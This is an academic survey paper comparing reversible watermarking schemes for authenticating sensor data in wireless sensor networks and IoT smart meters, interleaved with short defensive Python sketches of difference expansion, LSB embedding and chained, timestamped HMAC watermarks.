1 Introduction Wireless Sensor Networks (WSNs) are a set of autonomous devices to control physical or environmental features like temperature, pressure, sound, humidity, or pollution by constantly sensing data [1]. Contrasting conventional networks, WSNs are mostly set up in unattended locations, and collected data are sent to the remote user through a gateway using wireless channels [2]. With the advancements in electrical technology, a new approach for the next generation of WSNs has thrived. It includes many low-cost, low-power sensor nodes communicating wirelessly [3]. On a superior scale, the Internet of Things (IoT) network is formed with many sensors and tools joining the Internet for communication and data gathering. Flexibility, scalability and convenience used in smart homes, smart cities and industries have made IoT services popular in recent years [4]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 695–708, 2023. https://doi.org/10.1007/978-3-031-28073-3_47
696
T. K. Araghi et al.
Due to the restricted energy power, lack of resource reliability, unattended environment implementations, and data transferring risks in unprotected wireless channels, wireless sensors are threatened by potential menaces, including passive eavesdropping attacks or active attacks like data interception or tampering, leading to substantial problems like privacy disclosure [5]. Hence, network security is regarded as a key element for developing WSNs and IoT applications. An example of privacy infringement can occur in smart homes where personal information and user behavior can be analyzed and achieved precisely [6]. Some applications depend on the accuracy of the transmitted data to work properly; for instance, smart meters in smart homes and medical services. As a result, necessary integrity controls must be accomplished to promise that data will not be changed under any circumstances [7]. Ensuring the reliability and integrity of sensory data is a necessary security requirement in WSNs. However, due to the limited computing capacity, storage space and power, traditional cryptographic algorithms used to ensure data integrity are often costly for sensor nodes. In addition, due to the lack of battery resources, depth security is impossible on WSNs. These limitations gave rise to the possibility of exploiting a digital watermark. Digital Watermarking is an effective solution to ensure security, integrity, data authenticity, and robustness in WSN [8]. Its clear benefit is the minor cost of algorithm computation and communication. Watermarking algorithms are significantly lighter than cryptographic techniques and do not require additional communication costs. A common feature of these schemes is a few irreversible changes in the watermarked data. 
Although in multimedia applications these changes do not affect the visual (or auditory) perception and expression of the information, they are unacceptable in some critical applications that require highly accurate data, such as military or healthcare applications. Hence, a reversible watermark is recommended for this purpose [9]. The concepts of digital watermarking and reversible watermarking are explained in Sect. 3. Even though there are many watermarking schemes, especially in the field of multimedia, this paper focuses only on reversible watermarking techniques for WSNs. The rest of the paper is organized as follows: Sect. 2 presents a comparison between a WSN and one IoT application (smart meters). We discuss how the security mechanisms used in WSNs can be extended to similar IoT applications. Section 3 is devoted to the concepts of digital watermarking and reversible watermarking. The literature review and related works are detailed in Sect. 4. Section 5 compares and discusses the related works. Section 6 presents some tips, stemming from the results of our investigation, for designing and developing security in IoT applications. Finally, Sect. 7 outlines the conclusion and future work.
2 WSN and IoT Smart Meters in Summary
Regardless of the different protocols used to set up the network infrastructure and route data in WSN and IoT applications, the security methods for collecting and transmitting data from source sensors to the destination generally follow identical standards. Due to the
Evaluation and Analysis of Reversible Watermarking Techniques
approximately identical structure of data transmission in IoT applications such as smart meters and in common WSNs, the security considerations and policies developed for WSNs can be extended to IoT applications. Figure 1(a) shows data transactions in a typical WSN under the LEACH protocol. In LEACH, the sensor nodes are organized into a cluster-based WSN with a two-tier network architecture. Each sensor node is assigned to one of several partitions, each forming a cluster. Each cluster contains a special node called the cluster head. Each cluster head collects and aggregates data and then relays them to the sink node. Compared to ordinary sensor nodes, cluster heads have abundant computational resources [10].
Fig. 1. Data transfer in: (a) WSN under LEACH protocol, (b) Smart meter
Likewise, a smart metering system (see Fig. 1b) consists of the following components:
1. Smart meters (SMs): programmable services that produce data and are connected to the smart home.
2. Data aggregator: a service provider that collects, stores, and transmits energy consumption data from the SMs.
3. Control centre: manages the daily operations of the distributed network through a central distribution system responsible for verifying the authenticity and integrity of the aggregated data [11].
The information collected from the environment by the sensor nodes is sent to the cluster head (see Fig. 1a). The cluster head checks data authenticity; if the data are corrupted or their authenticity cannot be confirmed, the cluster head drops them. Otherwise, they are sent to the sink node. The same technique is used for smart meters. Figure 1(b) shows a smart metering system in which the information is collected by the smart meters and then sent to the aggregator. Like the cluster heads, the aggregator checks data integrity. If data authenticity cannot be confirmed, the data are dropped; otherwise, they are sent to the control centre. Because the capabilities, duties and types of the senders, receivers and intermediate nodes are similar, the security mechanisms used for data integrity in WSNs can also be applied to smart metering systems.
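The forwarding rule described above (an intermediate node relays data only when its integrity check succeeds) can be sketched in a few lines of Python. This is a minimal illustration and not one of the surveyed schemes: the packet layout, the shared key `SHARED_KEY`, the helper names `make_tag` and `relay`, and the use of a truncated HMAC-SHA256 tag in place of an embedded watermark are all assumptions made for the example.

```python
import hashlib
import hmac

SHARED_KEY = b"demo-key"  # hypothetical key shared by sender and intermediate node


def make_tag(readings, key=SHARED_KEY):
    """Return a short authentication tag over a list of integer readings."""
    payload = ",".join(str(r) for r in readings).encode()
    return hmac.new(key, payload, hashlib.sha256).digest()[:4]


def relay(packets, key=SHARED_KEY):
    """Forward packets whose tag verifies and drop the rest.

    Each packet is a (readings, tag) pair, standing in for the data a
    cluster head or aggregator receives. Returns (forwarded, dropped_count).
    """
    forwarded, dropped = [], 0
    for readings, tag in packets:
        if hmac.compare_digest(make_tag(readings, key), tag):
            forwarded.append(readings)   # authentic: send on to sink / control centre
        else:
            dropped += 1                 # corrupted or unauthenticated: drop
    return forwarded, dropped


good = [21, 22, 22, 23]
tampered = [21, 22, 99, 23]              # one reading altered in transit
packets = [(good, make_tag(good)), (tampered, make_tag(good))]
forwarded, dropped = relay(packets)
```

The same `relay` function would serve for a cluster head and for a smart-meter aggregator, which is the point the section makes: only the names of the endpoints differ.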
3 Digital Watermarking and Reversible Watermarking
Digital watermarking is fundamentally defined as hiding secret signals, known as watermarks, in the original data for the purpose of copyright protection or authentication [12]. Additionally, the bits carrying the watermark should be spread throughout the host data such that identifying them is impossible. The embedding technique must keep the original information logically intact, while a corresponding algorithm can extract the watermark signal [13]. Digital watermarking technology has been widely used in multimedia security, and its usage is also becoming pervasive in WSNs. Since the data values carried by sensors are relatively close to each other, the same techniques used for multimedia data are applicable [14]. Moreover, digital watermarking techniques do not impose additional cost or communication overhead, and they are much lighter than cryptographic algorithms. Thus, they are suitable for sensors with constrained resources. Reversible digital watermarking, or lossless watermarking, refers to techniques that can authenticate the protected data while accurately restoring the original sensing data. This technology has become a relatively new direction in the field of information security, capable of recovering the data entirely at no further cost [9]. Traditional non-reversible digital watermarking cannot restore the embedded data entirely when the sensed data have been attacked. This technique causes minor changes in the data, but the modification is irreversible. For applications such as military, medical treatment, and smart meters, non-reversible watermarks are not acceptable
because of the lack of accuracy [15]. Hence, reversible digital watermarking is the most appropriate option for WSNs. Lossless or reversible watermarking techniques are suitable for sensitive areas like forensic applications [16]. Although reversible watermarking techniques are more accurate and robust, they use more battery power [10].
4 Literature Review and Related Work
One of the most important applications of fragile watermarking is data authentication and integrity checking. Different fragile watermarking techniques have been proposed for image tamper detection. In this research, however, we classify those tamper detection watermarking techniques that are reversible and used in WSNs for data integrity. In the following, each technique is described with its strengths and drawbacks.
Guo et al. [17] present a scheme based on fragile chaining watermarks to confirm integrity and detect any data manipulation. Data streams are separated into groups of different sizes according to specific calculations. These calculations are based on hash functions and on data elements called synchronization points, which delimit the groups. The scheme is designed for streaming data in the application layer but applies to sensor networks when their data are treated as streams. Since each data group is synchronized to the previous group, any data tampering affects two adjacent groups. Moreover, any modification such as insertion, deletion or a change in a data value is recognizable. However, on some occasions, specific tampering may cause the system to calculate a wrong synchronization point; consequently, this uncertainty may persist over several groups or, in the worst case, over all groups of data.
Shi and Xiao [18] introduced a prediction-error expansion scheme to authenticate data in WSNs. In this scheme, two successive data groups are joined to make a confirmation group. The generator group is in charge of producing the watermark sequence, which is later embedded in the carrier group. Afterwards, the digital watermark is computed and embedded in the subsequent data chain. If any data group is tampered with, the tampering is detected because the verification process fails. This scheme is designed for a plain WSN architecture.
However, owing to the dynamic length of the groups and the large variation in length among them, watermark embedding may be incomplete. Furthermore, the data carrier group can be altered to some extent during transmission after the watermark is embedded, resulting in false synchronization points. Consequently, the grouping is confused, which leads to a high false positive rate. This is because the authors did not consider the overflow or underflow that stems from expanding the prediction errors. Another drawback of this scheme is its higher battery energy consumption compared to irreversible watermarking schemes [10]. Besides, as most routing paths pass through the sensor nodes close to the sink, these sensor nodes rapidly use up their battery energy, which shortens the network lifetime of the WSN.
Inspired by the scheme proposed by Shi and Xiao [18], Liu et al. [19] devised a lightweight integrity authentication scheme for Wireless Body Area Networks (WBANs). The authors implemented the scheme on a TinyOS-based WBAN test bed to confirm its feasibility and efficacy. Unlike the two previously explained schemes, the researchers used fixed-size data grouping to reduce the delay produced by calculating the synchronization points. In order to eliminate the possibility of overflow or underflow,
they utilized the histogram shifting technique. Local maps are created to repair the shifted data, while watermark generation and embedding are performed in a chaining procedure for data authentication. This scheme can consistently identify any change, such as insertion or deletion of biometric data, without causing any underflow or overflow throughout the watermarking procedures. In addition, when tampering is detected, the original data can be totally recovered. The authors claim that the computational complexity of their scheme is considerably lower than that of Shi and Xiao's scheme [18]. However, the scheme imposes a small overhead stemming from the data delimiters per packet in each group. Additionally, the time and energy cost of histogram shifting and local map generation must not be ignored. Moreover, the delays generated by buffering the data elements of the current group before embedding the watermark must be considered. These delays differ between data elements; the longest one is (N-1)/F, where N is the number of data elements in each group and F is the sampling rate of the pulse sensor [19]. Finally, the buffers used to cache the data elements of the current group consume memory in this scheme.
Wang Chundong et al. [6] presented a secure data communication scheme based on compressed sensing (CS) and digital watermarking in the Internet of Things. CS technology is characterized by simple encoding and complex decoding [20]. Through digital watermarking, the secret data are embedded into the ordinary data at the encoding end of the sensor node. The results show that this scheme can restore the original data, which satisfies the reversibility requirement of a number of applications that demand high accuracy. However, since the scheme appends additional information to the embedded watermark, extra memory is required to execute hashing, decrypt the asymmetric cipher, and perform the CS calculation, which leads to time overhead.
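To make the contrast between dynamic and fixed-size grouping concrete, the sketch below delimits groups in both ways and evaluates the longest buffering delay (N-1)/F quoted above. It is only an illustration under stated assumptions: the rule in `is_sync_point` (a keyed SHA-256 hash of the value being divisible by a parameter `m`) is a simplified stand-in for the hash-based synchronization points described in this section, and the key, the stream values and all function names are hypothetical.

```python
import hashlib


def is_sync_point(value, key, m):
    """Assumed rule: the keyed hash of the value is divisible by m."""
    digest = hashlib.sha256(key + str(value).encode()).digest()
    return int.from_bytes(digest, "big") % m == 0


def dynamic_groups(stream, key, m):
    """Close a group at every synchronization point (variable group sizes)."""
    groups, current = [], []
    for value in stream:
        current.append(value)
        if is_sync_point(value, key, m):
            groups.append(current)
            current = []
    if current:
        groups.append(current)  # trailing elements that have no delimiter yet
    return groups


def fixed_groups(stream, n):
    """Split the stream into consecutive groups of n elements."""
    return [stream[i:i + n] for i in range(0, len(stream), n)]


def max_buffer_delay(n, sampling_rate_hz):
    """Longest buffering delay (N - 1) / F, in seconds, for a group of N elements."""
    return (n - 1) / sampling_rate_hz


stream = list(range(100, 140))             # hypothetical sensor readings
dyn = dynamic_groups(stream, b"secret", 4)
fix = fixed_groups(stream, 8)
delay = max_buffer_delay(8, 50)            # 8 elements per group sampled at 50 Hz
```

With dynamic grouping, changing a single value can create or destroy a delimiter and therefore shift every later group boundary, which is the source of the false synchronization points discussed above. Fixed groups avoid the per-element hash but require the first element of a group to wait for the remaining N-1 samples.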
In the research proposed by Ding et al. [21], a reversible watermarking authentication scheme (RDE) is introduced for WSNs. It is derived from the difference expansion of a generalized integer transform. The source sensors build the watermark from the adjacent data using a one-way hash function and embed it into these data before sending them to the sink node. The experiments are performed in a real WSN environment and show that the scheme can preserve data integrity losslessly at a small energy cost. Compared with other lossless algorithms, this scheme can restore the original data entirely using the difference expansion of a generalized integer transform, which makes it a good candidate for applications that require high accuracy. At the same time, there is no data transmission overhead owing to the watermarking technique used. However, since each bit of the watermark is embedded in the least significant bits of the respective data entry, the integrity of the communication path cannot be verified [22].
Chu-Fu Wang et al. [10] proposed a lightweight Hybrid digital Watermarking Authentication technique (HWA) for data authentication under a specific network architecture. In HWA, irreversible and reversible watermarking are used for intra-cluster and inter-cluster communication, respectively.
The simulation results show that HWA balances data authentication against the battery usage of the sensors in the WSN. They also indicate the scheme's superiority in network lifetime and delivery ratio compared with irreversible watermarking methods. However, the scheme introduces both false positives and false negatives in the network.
Inspired by the research of Guo et al. [17], Guangyong Gao et al. [9] proposed a dynamic grouping and double verification algorithm to eliminate the false positive rate and low robustness problems in the group authentication of current reversible watermarking algorithms in WSNs. For this purpose, the authors proposed a reversible watermarking technique called Data integrity Authentication with High Detection Efficiency (DAHDE). Exploiting the close correlation of neighboring data in WSNs, the scheme predicts the original data according to the prediction-error expansion rule and adds a flag check bit to the data along with the watermark. This keeps the grouping stable and allows a forged synchronization point to be identified precisely during data transmission. Besides, the embedded watermark can be extracted correctly through the reversible watermarking algorithm. Experimental results confirm that the scheme can avoid false positives, decrease computational costs, and offer strong grouping robustness. However, using MD5, which is not a secure hash function, can endanger system security and increase the probability of collisions, which may compromise the whole algorithm.
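Several schemes in this section rely on difference expansion, so a small worked sketch of the basic idea may help. The code below implements the classic integer-pair difference expansion (one bit embedded per pair of neighboring readings) together with a range check for the overflow and underflow problem mentioned above. It is not the generalized integer transform of Ding et al. [21] nor the prediction-error variant of Shi and Xiao [18]; the function names and the assumed value range 0 to 1023 (a hypothetical 10-bit sensor) are illustrative only.

```python
def de_embed(x, y, bit, lo=0, hi=1023):
    """Embed one bit into the integer pair (x, y).

    Returns the marked pair, or None when the result would leave [lo, hi]
    (overflow/underflow), in which case the pair cannot carry a bit.
    """
    avg = (x + y) // 2             # integer average, preserved by the embedding
    diff = x - y
    expanded = 2 * diff + bit      # expand the difference and append the bit
    x_marked = avg + (expanded + 1) // 2
    y_marked = avg - expanded // 2
    if not (lo <= x_marked <= hi and lo <= y_marked <= hi):
        return None
    return x_marked, y_marked


def de_extract(x_marked, y_marked):
    """Recover the embedded bit and the original pair exactly."""
    avg = (x_marked + y_marked) // 2
    expanded = x_marked - y_marked
    bit = expanded % 2             # the appended bit is the parity of the difference
    diff = expanded // 2           # floor division undoes the expansion
    return bit, avg + (diff + 1) // 2, avg - diff // 2


marked = de_embed(206, 201, 1)     # two close neighboring readings
restored = de_extract(*marked)
too_wide = de_embed(1000, 10, 1)   # large difference: expansion leaves the range
```

Because neighboring sensor readings are usually close, their differences are small and the expansion rarely leaves the valid range; pairs that do overflow must be skipped and signaled to the receiver, which is the role played by location or local maps in practical schemes.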
5 Comparison and Discussion
In this section, all the reversible watermarking schemes mentioned in the related works are investigated based on the influential factors affecting the performance of each scheme. We analyzed the state-of-the-art schemes from different points of view and describe the results in Sects. 5.1 to 5.3. The first aspect of this comparison is the purpose for which the schemes were designed. For example, we compare whether the schemes are designed and implemented to preserve user privacy, save energy, and provide data authentication and integrity, as well as whether they can detect and prevent tampering or information leakage. This discussion is presented in Sect. 5.1. Another aspect of our comparison is a collection of influential factors that lead to optimum performance while offering a high level of security. We also included the time and energy overhead in this comparison. The results are presented in Sect. 5.2 and Table 2. Finally, the robustness and resistance of the schemes against attacks are analyzed in Sect. 5.3 and Fig. 2.
5.1 Design Purpose
Table 1 presents the design target of each scheme according to the threats to be countered. As shown in this table, the main purpose of the majority of the schemes is to detect and localize tampering, provide authenticity and restore lost data. Among all the proposed works, only Wang's and Ding's models aim to assure user privacy and prevent data leakage. Since all the schemes perform many repetitive calculations, such as computing hash functions for each data
group and embedding watermark data, only a minority of them offer an energy-saving method. However, the main advantage of watermarking-based security methods is that they eliminate transmission overhead. Since all the mentioned methods are based on reversible watermarking, the data restored after watermark extraction remain intact.
Table 1. Purpose of design. a: User privacy, b: Information leakage, c: Tamper detection, d: Data restoration, e: Authentication & integrity, f: Energy saving, g: Tamper location. Signs: √ = Yes, – = Not mentioned
Scheme                     | a | b | c | d | e | f | g
Guo et al. [17]            | – | – | √ | √ | √ | – | √
Xi Shi and Di Xiao [18]    | – | – | √ | √ | √ | – | √
Wang Chundong et al. [6]   | √ | √ | – | – | – | – | –
Liu et al. [19]            | – | – | √ | √ | √ | – | √
Qun Ding et al. [21]       | √ | √ | √ | √ | √ | – | √
Chu-Fu Wang et al. [10]    | – | – | √ | √ | √ | √ | √
Guangyong Gao et al. [9]   | – | – | √ | √ | √ | – | √
5.2 Influential Factors on System Performance
We categorized the most important influential factors that must be considered when designing a secure data transfer method for WSNs or for IoT applications such as smart meters. These factors are described as follows:
Watermark Type: the type of watermark depends on the purpose of data hiding. Fragile watermarks are usually the most applicable for authentication purposes, because every small change in the information destroys the digital watermark; as a result, data tampering is detected. If a fragile watermark can withstand some alterations, such as noise introduced by the transmission channels, it is called semi-fragile or lossless; otherwise, it is lossy. Since all the schemes investigated in Table 2 are aimed at data authentication and tamper detection, they use fragile watermarks. It can be seen that the schemes proposed by Ding, Shi and Liu are lossless, while Wang's scheme uses both lossy and lossless watermarks in two different phases of data transmission.
Time and Energy Overhead: these two parameters are closely related to each other and to the performance of the whole system. Security procedures introduce computational overhead, which imposes additional time and energy consumption. On the other hand, overly simple security procedures make it easier for attackers to compromise the scheme. Hence, a balance must be struck between security and computational complexity. According to Potlapally et al. [23], arithmetic, logical, and bitwise operations are regarded as lightweight operations, while hash functions, symmetric and asymmetric
Table 2. Comparison of the different schemes in terms of influential factors affecting security and efficiency. NA: Not mentioned
Influential factor | Wang Chundong et al. [6], 2014 | Qun Ding et al. [21], 2015 | Xi Shi, Di Xiao [18], 2013 | Guo et al. [17], 2007 | Liu et al. [19], 2014 | Guangyong Gao et al. [9], 2021 | Chu-Fu Wang et al. [10], 2018
Watermark type | Fragile | Lossless fragile | Lossless fragile | Fragile | Lossless fragile | Fragile | Both lossy & lossless
Time overhead | NA | Negligible | Yes | Yes | Yes | Yes | Yes
Energy overhead | Negligible | Ignorable | Yes | Yes | Yes | NA | Ignorable
Watermark embedding type | LSB | LSB | LSB | LSB | LSB | LSB | Phase 1: Redundant area of data; Phase 2: LSB
Watermark technique | Compressed sensing (CS) | Reversible Difference expansion (RDE) | Difference expansion + Chaining watermark | Chaining watermark + hash function (SHA, MD5) | Histogram shifting and chaining watermark | Difference expansion + Chaining watermark | Hybrid digital Watermarking Authentication (HWA)
Base of watermark creation | XOR (Group Hash (time stamp)) | Group Hash (data + time stamp) | Group Hash (data + secret key) | Chain [Hash (data + secret key) previous group and current group] | Concatenation (hash of each data group + local mapping (next group)) | Hash (data + group flag) | XOR (Group Hash (data))
False positive / negative effect | NA | Yes | Yes (FN), increases with the length of group parameter & attacks | Yes | NA | Yes (FN), increases with increasing tampered data | Yes, increases with the increasing attacking rate
Simulation environment | MATLAB | Real WSN environment | MATLAB | Java | TinyOS-based WBAN test bed + C programming language | MATLAB | C++ to build a simulator environment
Feasibility of implementation | Yes | Yes | NA | NA | Yes | NA | NA
Efficient security | Yes | Yes | Relates to hash type and synchronization point | No, due to use of MD5 | Depends on the synchronization point drop rate | No, due to use of MD5 | Yes
encryptions notably increase computational overhead. Usually, running 3,000 instructions consumes as much energy as transmitting one bit of data over 100 m [10]. For the same reason, in Table 2, the time and energy spent by Ding's scheme [21] are ignorable. The energy overhead of Wang [10] and Wang [6] is negligible as well. Nevertheless, all schemes investigated in Table 2 incur some energy and time overhead.
Watermark Embedding Type and Technique, Base of Watermark Generation and False Positive/Negative Effect (Rows 4 to 7 of Table 2): These items are presented in Table 2 based on the computational load, memory usage and false positive/negative effect that watermark generation, embedding and extraction impose on the system. As mentioned in the related works, almost all schemes generate and embed the watermark by dividing the data into several groups according to constant or dynamic parameters, computing the hash value of each data group, and finally chaining the resulting hash values to the previous or next group. In terms of computational load, dynamic grouping causes more overhead on the sensor nodes, because the size of the group must be controlled each time to avoid overflow or underflow problems. If either occurs, false positives or false negatives arise, which in the worst case jeopardize the security of the whole group. This problem is partly addressed in Gao's prediction scheme [9], while Ding et al. [21], Liu et al. [19] and Wang et al. [6] use fixed grouping in their methods, resulting in less computational overhead. Furthermore, the compressed sensing technique in Wang et al. [6] is also economical because it places less computational load on the sensor side and more on the sink node. In terms of memory usage, the chaining watermarks utilized in the schemes of Shi and Xiao [18], Guo et al. [17], Liu et al. [19], Gao et al. [9] and Wang et al. [10] need to buffer each group of data that participates in the chain. Therefore, memory usage increases with the size of these groups. However, Shi's prediction-error expansion method, which caches only the current data, can alleviate this issue. As shown in Table 2, the technique for embedding the watermark in all schemes is LSB. Least Significant Bit (LSB) embedding is one of the most basic techniques in digital watermarking and does not significantly affect the quality of the transmitted data [24]. Although the capacity for hidden data is small in this technique, it can be regarded as a suitable way to provide security in IoT and WSN applications. The probability of false positives and false negatives is high for schemes that define synchronization points (group delimiters) by whether the computed hash value is divisible by two, that is, even. Hence, the accuracy of these schemes cannot be trusted. The strength of the attacks can also affect the calculation of the synchronization points. Among the schemes in Table 2, Shi and Xiao [18] and Gao et al. [9] could eliminate false positives. However, false negatives can still occur in these schemes, depending on the severity of the attacks.
Simulation Environment, Feasibility of Implementation and Efficient Security (Rows 8–11 of Table 2): Table 2 shows that most of the schemes are implemented in the MATLAB environment. The only scheme implemented in a real environment is the method proposed by Ding et al. [21]. As a result, this scheme is more feasible in terms of implementation.
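The LSB embedding referred to throughout this section can be sketched as follows. This is a generic illustration of plain LSB replacement on non-negative integer samples, not the embedding routine of any particular scheme in Table 2; the function names and sample values are hypothetical.

```python
def embed_lsb(samples, bits):
    """Write one watermark bit into the least significant bit of each sample."""
    if len(bits) > len(samples):
        raise ValueError("not enough samples to carry the watermark")
    marked = list(samples)
    for i, bit in enumerate(bits):
        marked[i] = (marked[i] & ~1) | bit   # clear the LSB, then set it to the bit
    return marked


def extract_lsb(samples, n_bits):
    """Read the first n_bits watermark bits back from the samples."""
    return [s & 1 for s in samples[:n_bits]]


samples = [200, 201, 198, 203]               # hypothetical sensor readings
watermark = [1, 0, 1, 1]
marked = embed_lsb(samples, watermark)
recovered = extract_lsb(marked, len(watermark))
max_change = max(abs(a - b) for a, b in zip(samples, marked))
```

Each sample changes by at most one unit, which is why the effect on data quality is small. Note that plain replacement overwrites the original least significant bits, so on its own it is not reversible; the reversible schemes surveyed here pair the LSB step with a transform such as difference expansion or histogram shifting so that the original values can be restored.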
Efficient security in the table is related to parameters such as the type of hash function and the accurate calculation of the synchronization points. The probability of collision, which depends on the length of the produced hash, should also not be underestimated. The schemes of Guo et al. [17] and Gao et al. [9] can no longer be considered secure because they use MD5, which can be compromised easily.
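The dependence of collision probability on hash length can be made concrete with the standard birthday approximation, p ≈ 1 − exp(−n(n−1)/2^(b+1)) for n hashed groups and a b-bit digest. The sketch below evaluates it and, as a second small calculation, converts extra transmitted bits into an instruction count using the 3,000-instructions-per-bit figure quoted earlier from [10]. The function names are hypothetical, and the approximation assumes an ideal hash function: it does not model the practical collision attacks known against MD5, which are far cheaper than this bound suggests.

```python
import math


def collision_probability(n_items, hash_bits):
    """Birthday approximation for at least one collision among n_items digests."""
    exponent = n_items * (n_items - 1) / 2 ** (hash_bits + 1)
    return -math.expm1(-exponent)            # 1 - exp(-exponent), accurate for tiny values


def equivalent_instructions(extra_bits, instructions_per_bit=3000):
    """Instructions whose energy roughly equals sending extra_bits over 100 m [10]."""
    return extra_bits * instructions_per_bit


p_16 = collision_probability(300, 16)        # short 16-bit digest, 300 groups
p_128 = collision_probability(2 ** 32, 128)  # 128-bit digest (MD5 output length)
p_256 = collision_probability(2 ** 32, 256)  # 256-bit digest (SHA-256 output length)
cost_128 = equivalent_instructions(128)      # appending a 128-bit digest instead of embedding it
```

The first value shows how quickly a short digest collides, while the last line illustrates why embedding the watermark in the data, rather than appending a digest to each packet, matters for energy-constrained nodes.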
5.3 Resistance Against Attacks
Figure 2 shows the number and types of attacks that each scheme can resist. According to this figure, the scheme of Ding et al. [21] can detect and prevent nine types of attacks, followed by the scheme of Guo et al. [17], which can resist seven attacks, while the schemes proposed by Shi and Xiao [18], Liu et al. [19], Wang et al. [6] and Gao et al. [9] perform more or less similarly in terms of attack detection and prevention.
Fig. 2. Comparison of Schemes in Terms of Resistance against Attacks (attack analysis chart; attack categories: tampering & authentication, false negative, false positive, packet loss, data deletion, data modification, eavesdropping, data insertion, transfer delay, packet replay, selective forwarding, packet forgery; legend: Guo et al., Xi Shi and Di Xiao, Liu et al., Qun Ding et al., Guangyong Gao et al.; axis scale 0 to 5)
Overall, the best performance in attack detection and prevention, feasibility of implementation, and time and energy preservation belongs to the scheme of Ding et al. [21]. Moreover, this scheme incorporates time stamps into watermark generation, which helps to detect time-related manipulations such as replay attacks. The schemes by Wang Chundong et al. [6] and Chu-Fu Wang et al. [10] consume less energy, but their attack resistance is unremarkable. The work of Liu et al. [19] is innovative compared with the others due to its use of histogram restoration on WSN data, but it increases time and energy overhead. The other schemes are more or less similar, with approximately the same results regarding attack prevention, system security, memory usage, and false positive and negative detection.
6 Suggestions for Improving Security Performance for the Future Lightweight IoT-Based Design
In this section, some tips are suggested according to our observations regarding the influential factors affecting the performance of secure WSN and IoT-based transmission schemes:
• Using watermarking for authenticity and data integrity ensures the least transmission overhead, while reversible watermarking ensures data accuracy.
• The length of the hash is important: the longer the hash, the lower the probability of collision. Do not use the MD5 hash function.
• It is recommended to chain the computed hash values to the next or previous data groups. As a result, in case of a false positive, tampering can still be detected in the next round of checking.
• When data grouping is necessary, use data groups with fixed lengths instead of relating the synchronization points to the hash calculation, in order to avoid additional repetitive calculations and save time and energy.
• Use random numbers to keep data secret, avoid false positives stemming from miscalculated synchronization points, and reduce energy overhead.
• To avoid time-based attacks, such as the replay attack, use both timestamps and data for hashing and watermark generation. This assures data freshness, so that old data cannot be injected by attackers.
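Several of the suggestions above (fixed-length groups, a hash longer than MD5, chaining to the previous group, and hashing timestamps together with data) can be combined in one short sketch. The code below only generates and verifies the chained watermark values; the embedding step is omitted. The choice of HMAC-SHA256, the group size, the message layout and all names are assumptions made for illustration, not a design taken from the surveyed schemes.

```python
import hashlib
import hmac

GROUP_SIZE = 4  # hypothetical fixed group length


def group_watermark(key, readings, timestamps, previous):
    """Keyed hash over timestamps and data, chained to the previous group's value."""
    body = ",".join(f"{t}:{r}" for t, r in zip(timestamps, readings)).encode()
    return hmac.new(key, previous + b"|" + body, hashlib.sha256).digest()


def chain_watermarks(key, readings, timestamps, group_size=GROUP_SIZE):
    """Return one watermark per fixed-length group, each depending on its predecessor."""
    marks, previous = [], b""
    for i in range(0, len(readings), group_size):
        previous = group_watermark(
            key, readings[i:i + group_size], timestamps[i:i + group_size], previous
        )
        marks.append(previous)
    return marks


def first_mismatch(key, readings, timestamps, marks, group_size=GROUP_SIZE):
    """Index of the first group whose watermark fails to verify, or None."""
    expected = chain_watermarks(key, readings, timestamps, group_size)
    for index, (want, got) in enumerate(zip(expected, marks)):
        if not hmac.compare_digest(want, got):
            return index
    return None


key = b"demo-key"                                   # hypothetical shared secret
readings = [21, 22, 22, 23, 24, 24, 25, 25]
timestamps = [1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007]
marks = chain_watermarks(key, readings, timestamps)

tampered = readings[:5] + [99] + readings[6:]       # value changed in the second group
replayed = [t + 3600 for t in timestamps]           # old data re-sent with new timestamps
clean_result = first_mismatch(key, readings, timestamps, marks)
tamper_result = first_mismatch(key, tampered, timestamps, marks)
replay_result = first_mismatch(key, readings, replayed, marks)
```

Because the timestamps enter the hash, data replayed under fresh timestamps no longer match their watermarks, and because each value is chained to its predecessor, a modification in one group also invalidates every later group, giving a second chance to detect it.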
7 Conclusion and Future Work
Cryptographic methods usually impose a heavy computational load and transmission overhead on sensors with constrained resources. Considering the limited power and memory of sensor networks, these techniques are not suitable for practical implementation. Reversible watermarking techniques not only ensure security but also remove transmission overhead. In this research, we investigated a collection of recent reversible watermarking techniques in WSNs to elaborate on the influential factors that improve the performance of secure communications and data authentication. These factors are categorized as the ability to withstand attacks, false positive/negative detection, time and energy overhead, etc. Moreover, based on these influential factors, Sect. 6 provides some suggestions for improving the security performance of IoT applications, such as smart meters, with a lightweight design. In summary, these suggestions combine watermarking techniques with cryptographic functions to alleviate the heavy computational burden while achieving an appropriate level of robustness against attacks. We believe this work can inspire researchers to design secure methods for data authenticity in other integrity-sensitive IoT applications, such as smart meters. Future work is to design a secure method for smart meters according to the results and achievements of this research.
References
1. Kore, A., Patil, S.: Cross layered cryptography based secure routing for IoT-enabled smart healthcare system. Wireless Netw. 28(1), 287–301 (2021). https://doi.org/10.1007/s11276-021-02850-5
2. Demertzi, V., Demertzis, S., Demertzis, K.: An Overview of Cyber Threats, Attacks, and Countermeasures on the Primary Domains of Smart Cities. arXiv preprint arXiv:2207.04424 (2022)
3. Vani, G., Shariff, N.C., Biradar, R.K.L.: An investigation of secure authentication systems in wireless sensor networks. Int. J. Early Childhood 14, 2022 (2022)
4. Sumathi, A.C., Akila, M., Pérez de Prado, R., Wozniak, M., Divakarachari, P.B.: Dynamic bargain game theory in the internet of things for data trustworthiness. Sensors 21, 7611 (2021)
5. Mo, J., Hu, Z., Shen, W.: A provably secure three-factor authentication protocol based on chebyshev chaotic mapping for wireless sensor network. IEEE Access 10, 12137–12152 (2022)
6. Wang, C., Bai, Y., Mo, X.: Data secure transmission model based on compressed sensing and digital watermarking technology. Wuhan Univ. J. Nat. Sci. 19(6), 505–511 (2014). https://doi.org/10.1007/s11859-014-1045-x
7. Venkatachalam, C., Suresh, D.: Combinatorial Asymmetric Key Cryptosystem and Hash Based Multifactor Authentication Techniques for Secured Data Communication in WSN (2022)
8. Kumar, S., Singh, B.K., Pundir, S., Joshi, R., Batra, S.: Role of digital watermarking in wireless sensor network. Recent Advances in Computer Science and Communications (Formerly: Recent Patents on Computer Science), vol. 15, pp. 215–228 (2022)
9. Gao, G., Feng, Z., Han, T.: Data authentication for wireless sensor networks with high detection efficiency based on reversible watermarking. Wireless Commun. Mobile Comput. 2021 (2021)
